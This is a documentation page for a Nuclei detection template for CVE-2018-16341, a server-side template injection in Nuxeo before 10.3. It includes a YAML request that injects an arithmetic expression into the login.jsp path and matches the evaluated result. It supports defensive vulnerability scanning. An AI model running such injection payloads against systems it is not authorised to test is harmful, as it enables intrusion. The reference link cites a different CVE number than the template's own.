Nuxeo <10.3 - Remote Code Execution
ID: CVE-2018-16341
Severity: high
Author: madrobot
Tags: cve,cve2018,nuxeo,ssti,rce,bypass
Description
Section titled “Description”Nuxeo prior to version 10.3 is susceptible to an unauthenticated remote code execution vulnerability via server-side template injection.
YAML Source
Section titled “YAML Source”id: CVE-2018-16341
info: name: Nuxeo <10.3 - Remote Code Execution author: madrobot severity: high description: | Nuxeo prior to version 10.3 is susceptible to an unauthenticated remote code execution vulnerability via server-side template injection. impact: | Successful exploitation of this vulnerability could allow an attacker to execute arbitrary code on the affected system. remediation: | Upgrade Nuxeo to version 10.3 or later to mitigate this vulnerability. reference: - https://nvd.nist.gov/vuln/detail/CVE-2018-16299 classification: cve-id: CVE-2018-16341 metadata: max-request: 1 tags: cve,cve2018,nuxeo,ssti,rce,bypass
http: - method: GET path: - "{{BaseURL}}/nuxeo/login.jsp/pwn${31333333330+7}.xhtml"
matchers: - type: word part: body words: - "31333333337"# digest: 4b0a004830460221008466a6d00a44f48acbc81c40cb2fa047f4b5e7f62a6e010343ea0e0f39df13ae022100c0b0aac8d1b3f8985c5080ddab4e06970351cf3b748ef769b73278125571bbeb:922c64590222798bb761d5b6d8e72950Guide to check the vulnerabilities
Section titled “Guide to check the vulnerabilities”This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.
$ nuclei -u "URL" -t "http/cves/2018/CVE-2018-16341.yaml"